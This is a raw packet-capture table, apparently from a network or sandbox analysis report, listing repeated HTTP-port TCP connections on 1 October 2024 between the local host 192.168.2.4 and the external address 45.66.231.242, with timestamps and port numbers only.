              Oct 1, 2024 10:55:57.440419912 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.445255995 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:57.445349932 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.447319031 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.452054977 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:57.452107906 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.456886053 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.586699009 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.586723089 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.586843967 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.593215942 CEST4979180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.598040104 CEST804979145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.748565912 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.755343914 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.755429029 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.757473946 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.764569998 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:58.764642000 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:58.771171093 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.517257929 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.517374039 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.517424107 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.517474890 CEST4979280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.522201061 CEST804979245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.667659044 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.672612906 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.672698975 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.675770998 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.680578947 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:59.680644989 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:59.685587883 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.358503103 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.358524084 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.358622074 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.358645916 CEST4979380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.363531113 CEST804979345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.501411915 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.506222010 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.506443977 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.508444071 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.513233900 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:00.513320923 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:00.518099070 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.260781050 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.260936975 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.261046886 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.261101007 CEST4979480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.265824080 CEST804979445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.426647902 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.431473017 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.431678057 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.434482098 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.439357042 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:10.439429045 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:10.444247961 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.179004908 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.179017067 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.179166079 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.179214954 CEST4979580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.184005022 CEST804979545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.341063976 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.345901966 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.346103907 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.349014997 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.353781939 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:11.353854895 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:11.358649015 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.004467010 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.004600048 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.004873991 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.004939079 CEST4979680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.009437084 CEST804979645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.159826994 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.164660931 CEST804979745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.164880037 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.177352905 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.182214975 CEST804979745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.182284117 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.187068939 CEST804979745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.873409033 CEST804979745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.873677969 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:12.878757000 CEST804979745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:12.878864050 CEST4979780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.035339117 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.040534973 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.040647984 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.043592930 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.048494101 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.048624039 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.054224968 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.732716084 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.732745886 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.732989073 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.732989073 CEST4979880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.740119934 CEST804979845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.898308992 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.903100967 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.903306007 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.906301022 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.911075115 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:13.911144018 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:13.915899992 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.662214041 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.662345886 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.662420988 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.662488937 CEST4979980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.668284893 CEST804979945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.800889969 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.805808067 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.805883884 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.808928013 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.813663960 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:14.813721895 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:14.818471909 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.549448013 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.549463034 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.549540043 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.552753925 CEST4980080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.557519913 CEST804980045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.694262028 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.699174881 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.699311018 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.702488899 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.707354069 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:15.707474947 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:15.712326050 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.583683014 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.583957911 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.584099054 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.584214926 CEST4980180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.590965986 CEST804980145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.745603085 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.750842094 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.750915051 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.753540993 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.758394957 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:16.758460045 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:16.763644934 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.493792057 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.494151115 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.494273901 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.496754885 CEST4980280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.501549006 CEST804980245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.767184019 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.772124052 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.772222042 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.784352064 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.789354086 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:17.789424896 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:17.794210911 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.570405960 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.570424080 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.570507050 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.570593119 CEST4980380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.575285912 CEST804980345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.716825008 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.722038984 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.722162962 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.724112034 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.728981972 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:21.729047060 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:21.733994961 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.785677910 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.785753965 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.785810947 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.785964012 CEST4980480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.790596008 CEST804980445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.920218945 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.925117016 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.925271988 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.927316904 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.932210922 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:22.932406902 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:22.937263012 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.757464886 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.757534027 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.757565022 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.757603884 CEST4980580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.762391090 CEST804980545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.902941942 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.907851934 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.907937050 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.909893990 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.914652109 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:23.914706945 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:23.919522047 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.643047094 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.643142939 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.643202066 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.643243074 CEST4980680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.648158073 CEST804980645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.778748989 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.783708096 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.783783913 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.785759926 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.790565968 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:27.790640116 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:27.795490026 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.561955929 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.562108040 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.562141895 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.562171936 CEST4980780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.566910982 CEST804980745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.705497980 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.710371017 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.710477114 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.712415934 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.717246056 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:28.717307091 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:28.722081900 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.396918058 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.396960974 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.397053003 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.397099972 CEST4980880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.402143002 CEST804980845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.535343885 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.540148973 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.540234089 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.543512106 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.548310995 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:29.548372030 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:29.553191900 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.238183975 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.238261938 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.238348961 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.238497972 CEST4980980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.243287086 CEST804980945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.391628027 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.396502972 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.396624088 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.398751020 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.403630972 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:30.403711081 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:30.408608913 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.057346106 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.057543039 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.057615995 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.096518040 CEST4981080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.101296902 CEST804981045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.345984936 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.350828886 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.350925922 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.355782986 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.360622883 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:31.360697985 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:31.365572929 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.074229002 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.074245930 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.074354887 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.074414015 CEST4981180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.079313040 CEST804981145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.231419086 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.236382008 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.236579895 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.239622116 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.244415045 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.244487047 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.249366045 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.917283058 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.917331934 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:32.917597055 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.917597055 CEST4981280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:32.922481060 CEST804981245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.065752983 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.070699930 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.070812941 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.073720932 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.078677893 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.078751087 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.083571911 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.794236898 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.794632912 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:33.794816971 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.839329958 CEST4981380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:33.845001936 CEST804981345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.251277924 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.256083965 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.256186008 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.259226084 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.263988018 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.264055014 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.268954992 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.954164982 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.954281092 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:34.954399109 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.954399109 CEST4981480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:34.959453106 CEST804981445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.106074095 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.110893965 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.111094952 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.113996029 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.118736029 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.118822098 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.123569965 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.846981049 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.847107887 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.848056078 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.848112106 CEST4981580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.853991985 CEST804981545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.994165897 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:35.999106884 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:35.999219894 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.002137899 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.006947041 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:36.007121086 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.011867046 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:36.897743940 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:36.897759914 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:36.897883892 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:36.897917032 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.897983074 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.898077965 CEST4981680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:36.903028011 CEST804981645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.063914061 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.068876028 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.069091082 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.072134018 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.076915979 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.076988935 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.081810951 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.826824903 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.826932907 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.827181101 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.827413082 CEST4981780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.832349062 CEST804981745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.980405092 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.985778093 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.985889912 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.988904953 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.993758917 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:37.993838072 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:37.999326944 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.657680035 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.657710075 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.657816887 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.657917976 CEST4981880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.662708044 CEST804981845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.804476976 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.809437990 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.809638977 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.812674999 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.817497969 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:38.817576885 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:38.822448969 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.503447056 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.503530025 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.503640890 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.503735065 CEST4981980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.508519888 CEST804981945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.657680035 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.664352894 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.664554119 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.669230938 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.675410032 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:39.675483942 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:39.681597948 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.380754948 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.380783081 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.380881071 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:40.380932093 CEST4982080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:40.385790110 CEST804982045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.529465914 CEST4982180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:40.534312963 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.534426928 CEST4982180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:40.538661957 CEST4982180192.168.2.445.66.231.242
